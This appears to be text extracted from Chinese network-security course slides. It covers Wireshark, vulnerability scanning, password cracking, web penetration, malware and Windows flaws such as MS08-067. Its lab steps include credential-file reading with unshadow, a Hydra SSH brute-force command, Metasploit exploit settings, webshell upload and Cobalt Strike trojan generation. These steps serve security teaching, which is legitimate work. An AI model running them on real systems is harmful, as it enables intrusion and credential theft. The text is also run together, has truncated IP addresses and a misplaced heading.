DDI等中读取（取决于用户的平台）（11）支持对许多协议的解密，包括IPsec、ISAKMP、Kerberos、SNMPv3、SSL/TLS、WEP和WPA/WPA2（12）可以将着色规则应用于数据包列表，以便进行快速、直观的分析（13）输出可以导出为XML、PostScript、CSV或纯文本4.1.2Wireshark介绍本课件是可编辑的正常PPT课件01020304网络管理员可以使用它来解决网络问题网络安全工程师可以使用它来检查安全问题质量保证工程师可以使用它来验证网络应用开发人员使用它可以来调试协议05网络工程师可以使用它来学习网络协议2．Wireshark的使用场景本课件是可编辑的正常PPT课件3．Wireshark的安装（1）下载Wireshark运行→安装向导→单击“Next”（4）安装中选择默认配置，即一直单击“Next”按钮（2）在“ChooseInstallLocation”窗口→单击“Browse...”→选择软件安装位置→单击“Next”（5）“Completing

Wireshark4.0.864-bitSetup”窗口→单击“Finish”（3）在“USBCapture”窗口→勾选“InstallUSBPcap”→单击“Install”→开始安装本课件是可编辑的正常PPT课件4．Wireshark中文设置如果你选择中文，请选择合适的字体：“编辑”→“首选项设置”→“用户接口”→“字体”本课件是可编辑的正常PPT课件5．Wireshark使用说明1）确定Wireshark的位置2）选择捕获接口3）使用捕获过滤器4）使用显示过滤器5）使用着色规则6）构建图表7）重组数据本课件是可编辑的正常PPT课件4.1.3数据包分析实例数据包分析实例1．背景有一个网站被8恶意入侵，使用Wireshark可以抓到被攻击的流量，分析数据包，找到这次入侵的漏洞。2．步骤（1）启动网站与Wireshark（2）用漏洞扫描工具扫描网站，扫描出SQL注入漏洞（3）在Wireshark上寻找并分析SQL注入漏洞的POST请求包（4）找出SQL注入漏洞利用的关键字即可定位数据包及发生注入的参数本课件是可编辑的正常PPT课件4.2漏洞检测本课件是可编辑的正常PPT课件4.2.1漏洞检测的概念安全漏洞是指计算机系统在硬件、软件、协议的设计、具体实现及系统安全策略上存在的缺陷和不足。漏洞检测就是希望能够防患于未然，在漏洞被利用之前发现漏洞并修补漏洞。本课件是可编辑的正常PPT课件1．主机在线探测为了避免不必要的空扫描，在扫描之前一般要先探测主机是否在线其实现原理和常用的ping命令相似具体方法是向目标主机发送ICMP报文请求，根据返回值来判断主机是否在线2．端口状态探测发送1个SYN包到主机端口并等待响应如果端口打开，则响应必定是SYN+ACK信息包如果端口关闭，则会收到RST+ACK信息包这个扫描可以被称为半打开（Half-Scan）扫描4.2.2漏洞检测的原理本课件是可编辑的正常PPT课件3．操作系统探测在进行网络入侵或攻击时，了解操作系统的类型是相当重要的，因为攻击者可以由此明确利用哪种漏洞，或者由此掌握操作系统存在的弱点。4．主机漏洞检测漏洞检测是指使用漏洞检测程序对目标系统进行信息查询。一般主要通过以下两种方法来检查目标主机是否存在漏洞：

基于漏洞库的规则匹配和基于模拟攻击。本课件是可编辑的正常PPT课件4.2.3漏洞检测技术1．安全扫描3．反汇编扫描4．环境错误注入2．源代码扫描本课件是可编辑的正常PPT课件4.2.4漏洞检测工具（1）Nessus：可以同时在本机或远端上遥控，进行系统的漏洞分析扫描。（2）OpenVAS：一个开源的漏洞扫描器，用于评估网络的安全性。（3）QualysGuard：一个云计算安全评估工具，用于评估网络、Web应用程序和移动应用程序的安全性。（4）BurpSuite：一个专业级的Web应用程序安全测试工具，用于检测Web应用程序中的安全漏洞。本课件是可编辑的正常PPT课件4.2.5漏洞检测实例实例1：目标及要求（1）掌握漏洞扫描器Nessus的安装及使用。（2）对扫描出的漏洞进行了解。本课件是可编辑的正常PPT课件实例2：目标及要求（1）掌握Web漏洞扫描器AWVS的安装及使用。（2）对扫到的漏洞进行了解或进一步利用获得的权限。本课件是可编辑的正常PPT课件实例3：目标及要求（1）掌握Web安全扫描工具AppScan的安装及使用。（2）对扫描到的漏洞进行了解或进一步利用获得的权限。本课件是可编辑的正常PPT课件4.3密码破解本课件是可编辑的正常PPT课件密码破解是指使用技术手段破译或猜测密码的过程。密码是用来保护信息安全的数字账户，如电子邮件账户、社交媒体账户、银行账户等的重要信息和数据的一种安全措施。本课件是可编辑的正常PPT课件4.3.1数据加密技术数据加密技术又被称为密码技术或密码学，它是一门既古老又年轻的学科。随着互联网的发展，现代密码学的应用从政治、军事、外交等传统领域开始进入商业、金融、娱乐等领域，它的商业价值和社会价值得到了充分肯定也极大地推动了现代数据加密技术的应用和发展。1.数据加密技术概述1）保护信息的机密性2）保护信息的完整性3）认证4）访问控制2.数据加密技术的功能本课件是可编辑的正常PPT课件3.数据加密算法现代加密算法简介实现数据加密（1）对称加密算法（2）非对称密钥算法（3）单向加密算法（1）寻找在线加密的网站（2）手动编写加密程序本课件是可编辑的正常PPT课件4.3.2密码破解方法字典攻击社会工程攻击强行攻击密码破解方法本课件是可编辑的正常PPT课件4.3.3密码破解实例——使用JohntheRipper破解Linux操作系统密码内容JohntheRipper是免费的开源软件，支持目前大多数的加密算法，如DES、MD4、MD5等。它支持多种不同类型的系统架构，包括UNIX、Linux、Windows、DOS、BeOS和OpenVMS，主要目的是破解不够牢固的UNIX/Linux操作系统密码。在本实验中，我们事先登录Linux操作系统并切换为管理员权限，以便获取/etc/passwd和/etc/shadow文件。步骤（1）登录Linux操作系统，以超级用户权限执行

unshadow/etc/passwd/etc/shadow>shadow（2）在刚刚写入的shadow文件目录执行

john--format=cryptshadow本课件是可编辑的正常PPT课件4.3.4密码破解实例——使用Hydra暴力破解SSH密码内容Hydra是一种强大的网络安全测试工具，旨在测试网络的安全性和漏洞。它是一个鱼叉攻击工具，通过尝试不同的用户名和密码组合，以及暴力破解攻击等方法，来测试系统的弱点。本次攻击机的IP地址为28，靶机的IP地址31。步骤在攻击机上安装Hydra并执行命令hydra-Luser.txt-Ptop100_ssh_vps.txt31ssh-vV本课件是可编辑的正常PPT课件4.4Web渗透本课件是可编辑的正常PPT课件4.4.1Web架构1．静态网页请求——HTML3．动态数据访问——数据库服务器2．动态网页请求——小程序4．用户状态信息的保存本课件是可编辑的正常PPT课件4.4.2Web安全需求Web安全需求1．Web服务器的安全需求1）维护公布信息的真实性和完整性2）维持Web服务的安全可用3）保护Web访问者的隐私4）保证Web服务器不被入侵者作为“跳板”2．Web浏览器的安全需求（1）确保运行Web浏览器的系统不被计算机病毒、木马或其他恶意程序侵害而被破坏。（2）确保个人安全信息不外泄。（3）确保所交互的站点的真实性，以免被骗，遭受损失。3．Web传输的安全需求（1）保证发送方（信息）的真实性。（2）保证传输信息的完整性。（3）特殊的安全性较高的Web要求传输具有保密性。（4）认证应用的Web要求信息具有不可抵赖性。（5）防伪要求较高的Web应用需要保证信息的不可重用性。本课件是可编辑的正常PPT课件4.4.3Web渗透测试名词介绍测试方法工具介绍1.黑盒测试Metasploit蚁剑（AntSword）Webshell

一句话木马RCE

（RemoteCodeExecution，远程代码执行）SQL

注入XSS

（Cross-SiteScripting）注入SSI

（ServerSideInclude）注入SSRF（Server-SideRequestForgery）任意文件读取等价类划分法边界值分析法错误推测法因果图法本课件是可编辑的正常PPT课件白盒测试的优点：（1）迫使测试人员仔细思考软件的实现。（2）可以检测代码中的每条分支和路径。（3）揭示隐藏在代码中的错误。（4）对代码的测试比较彻底。（5）最优化。白盒测试的缺点：（1）昂贵。（2）无法检测代码中遗漏的路径和数据敏感性错误。（3）不验证规格的正确性。白盒测试的优缺点白盒测试的测试方法有代码检查法、静态结构分析法、静态质量度量法、逻辑覆盖法、基本路径测试法、域测试、符号测试、路径覆盖和程序变异。白盒测试的覆盖标准有语句覆盖、判定覆盖、条件覆盖、判定/条件覆盖、条件组合覆盖和路径覆盖，发现错误的能力由弱至强。测试方法及覆盖标准2.白盒测试本课件是可编辑的正常PPT课件1.黑盒测试实例（1）准备ThinkPHP5.0.22远程代码执行的Payload（攻击载荷）（2）使用BurpSuite发送Payload（3）成功执行phpinfo()使用BurpSuite攻击ThinkPHP5.0.22的Web应用程序（1）利用漏洞在网站根目录写入shell.php（2）使用蚁剑工具进行连接（3）连接之后可以在被攻击的目标上执行命令，以及上传和下载文件使用蚁剑连接Webshell4.4.4Web渗透实例本课件是可编辑的正常PPT课件2.白盒测试实例（1）从Web应用程序的代码中寻找可能存在的漏洞（2）使用MySQLMonitor来监控数据库执行语句（3）使用FileMonitor来监控网站根路径下的文件本课件是可编辑的正常PPT课件4.5恶意代码本课件是可编辑的正常PPT课件RogerA.Grimes将恶意代码定义为：经过存储介质和网络进行传播，从一台计算机系统到另外一台计算机系统，未经授权认证破坏计算机系统完整性的程序或代码。它包括计算机病毒、蠕虫、特洛伊木马、逻辑炸弹、病菌、用户级RootKit、核心级RootKit、脚本恶意代码和恶意ActiveX控件等。本课件是可编辑的正常PPT课件4.5.1计算机病毒1.计算机病毒的定义计算机病毒是人为制造的、能够进行自我复制的、破坏计算机资源的一组程序或命令的集合。3.典型的计算机病毒1）脚本病毒2）宏病毒3）HTML病毒2.计算机病毒的工作原理1）感染2）潜伏3）传播4）发作本课件是可编辑的正常PPT课件4.5.2蠕虫2.蠕虫的传播过程1）扫描2）攻击3）复制1.蠕虫的定义蠕虫是一种特殊的计算机病毒。蠕虫不需要用户的操作，只要驻留在内存中，它就会主动向其他的计算机进行传播。本课件是可编辑的正常PPT课件1.木马概述木马是目前比较流行的病毒文件，与一般的计算机病毒不同，木马的作用是偷偷监视和盗窃密码、数据等。2.木马的特性1）隐蔽性2）自动运行性3）欺骗性4）自动恢复5）自动打开特别的端口6）功能的特殊性3.木马类型1）后门木马2）链接木马3）下载木马4）蠕虫木马4.防范和清除木马1）不随意下载软件2）不随意打开附件3）使用防毒软件并经常更新病毒库4）查看文件扩展名5）安装木马查杀工具4.5.3木马本课件是可编辑的正常PPT课件4.5.4恶意代码实例——CobaltStrike远控木马实验工具CobaltStrike（以下简称CS）是一款以Metasploit为基础的GUI的框架式渗透测试工具，它包括两个可运行的程序teamserver和cobaltstrike.jar。目的使用CS对目标计算机进行控制。步骤（1）在下载和安装木马软件前，需要关闭杀毒软件的自动防护功能（2）攻击者在远程目标主机上运行teamserver，将连接口令设置为4040404（3）运行cobaltstrike.jar，打开CS客户端，输入远程服务器IP地址和服务器端启动时的连接口令，单击“Connect”（4）在首页选择“CobaltStrike”→“Listeners”→“Add”命令，配置监听器参数，单击“Save”（5）先选择“Payloads”→“WindowsStagerPayload”，然后选择创建的监听器，单击“Generate”来生成木马（6）假设攻击者已经将木马的服务器端程序偷偷放到了目标主机上，并在目标主机上加载运行了刚刚生成的木马。（7）接下来攻击者可以使用CS客户端来操作目标主机。本课件是可编辑的正常PPT课件4.6信息隐藏本课件是可编辑的正常PPT课件信息隐藏也被称为数据隐藏（DataHiding），是集多学科理论与技术于一身的新兴技术领域。信息隐藏技术主要是指将特定的信息嵌入数字化宿主信息（如文本，数字化的声音、图像、视频信号等）中。4.6.1信息隐藏概述本课件是可编辑的正常PPT课件4.6.2信息隐藏实例1．利用云函数来隐藏C2服务器2．利用域前置来隐藏C2服务器3．防范利用云函数隐藏的恶意服务器本课件是可编辑的正常PPT课件第五章常见的系统漏洞本课件是可编辑的正常PPT课件5.1MS08_067漏洞本课件是可编辑的正常PPT课件5.1.1MS08_067漏洞概述MS08-067漏洞的全称是“WindowsServer服务RPC请求缓冲区溢出漏洞”，是在MSRPCoverSMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的。在远程访问其他主机时，会调用NetpwPathCanonicalize函数，对远程访问的路径进行规范化，如果在NetpwPathCanonicalize函数中发生了栈缓冲区内存错误，就可能被利用实施远程代码执行。本课件是可编辑的正常PPT课件（1）MicrosoftWindows2000ServicePack4（2）WindowsXPServicePack2（3）WindowsXPServicePack3（4）WindowsXPProfessionalx64Edition（5）WindowsXPProfessionalx64EditionServicePack2（6）WindowsServer2003ServicePack1（7）WindowsServer2003ServicePack2（8）WindowsServer2003x64Edition（9）WindowsServer2003x64EditionServicePack2（10）WindowsServer2003SP15.1.2MS08_067漏洞影响的系统及版本本课件是可编辑的正常PPT课件（11）WindowsServer2003SP2（12）WindowsVista和WindowsVistaServicePack1（13）WindowsVistax64Edition和WindowsVistax64EditionServicePack1（14）WindowsServer2008（用于32位系统）（15）WindowsServer2008（用于基于x64的系统）（16）WindowsServer2008（用于基于Itanium的系统）（17）Windows7Beta（用于32位系统）（18）Windows7Betax64Edition（19）Windows7Beta（用于基于Itanium的系统）本课件是可编辑的正常PPT课件5.1.3MS08_067漏洞复现（1）在Metasploit工具终端使用msfconsole打开控制台后依次输入以下命令。使用该漏洞的利用模块：useexploit/windows/smb/ms08_067_netapi使用攻击载荷：setpayloadgeneric/shell_bind_tcp设置攻击机器监听端口：setlport4444设置攻击目标的IP地址：setrhosts执行攻击：exploit（2）执行“cd..”命令2次返回到根目录，执行“typetest.txt”命令查看被攻击计算机上C盘目录下的test.txt文件的内容。本课件是可编辑的正常PPT课件5.1.4MS08_067漏洞造成的危害攻击者可以利用MS08_067漏洞获取目标主机的最高系统权限。本课件是可编辑的正常PPT课件5.1.5修补措施（1）升级到最新的Windows操作系统。（2）安装KB958644补丁。本课件是可编辑的正常PPT课件5.2MS15_034漏洞本课件是可编辑的正常PPT课件5.2.1MS15_034漏洞概述HTTP协议堆栈（HTTP.sys）中存在一个远程代码执行漏洞，当HTTP.sys错误地解析特制HTTP请求时，会触发该漏洞。成功利用此漏洞的攻击者可以在系统账户的上下文中执行任意代码。本课件是可编辑的正常PPT课件5.2.2MS15_034漏洞影响的系统及版本（1）WindowsServer2003。（2）WindowsVista。（3）WindowsServer2008。（4）Windows7。（5）WindowsServer2008R2。（6）Windows8和Windows8.1。（7）WindowsServer2012和WindowsServer2012R2。（8）WindowsRT和WindowsRT8.1。本课件是可编辑的正常PPT课件（1）在Metasploit工具终端使用msfconsole打开控制台后依次输入以下命令。使用该漏洞的利用模块：

use

auxiliary/scanner/http/ms15_034_http_sys_memory_dump

设置攻击目标的IP地址：setrhosts执行攻击：run（2）利用MS15_034漏洞。（3）查看目标计算机。（4）造成溢出，触发漏洞造成蓝屏5.2.3MS15_034漏洞复现本课件是可编辑的正常PPT课件5.2.4MS15_034漏洞造成的危害（1）远程读取IIS服务器的数据。（2）造成服务器系统蓝屏崩溃。本课件是可编辑的正常PPT课件5.2.5修补措施对于MS15_034漏洞，微软给的建议是安装补丁KB3042553。如果操作系统长时间未进行升级会显示“此更新不适用于您的计算机”，此时需要安装前置补丁KB3021910、KB2919355、KB3042553。其中，KB2919355是一组补丁。安装补丁后，使用Range验证，响应为“BadRequest”，说明此攻击无效，已经修复漏洞。本课件是可编辑的正常PPT课件5.3MS17_010漏洞本课件是可编辑的正常PPT课件5.3.1MS17_010漏洞概述MS17-010（永恒之蓝漏洞）的爆发源于WannaCry勒索病毒的诞生，该病毒是不法分子利用美国国家安全局泄露的漏洞“EternalBlue”（永恒之蓝）改造而成的。MS17-010漏洞通过TCP的445和139端口，利用SMBv1和NBT中的远程代码执行漏洞，通过恶意代码扫描并攻击开放445文件共享端口的Windows主机。本课件是可编辑的正常PPT课件（1）WindowsNT。（2）Windows2000。（3）WindowsXP。（4）Windows2003。（5）WindowsVista。（6）Windows7。（7）Windows8。（8）Windows2008。（9）Windows2008R2。（10）WindowsServer2012SP0。5.3.2MS17_010漏洞影响的系统及版本本课件是可编辑的正常PPT课件5.2.3MS15_034漏洞复现（1）在Metasploit工具终端使用msfcon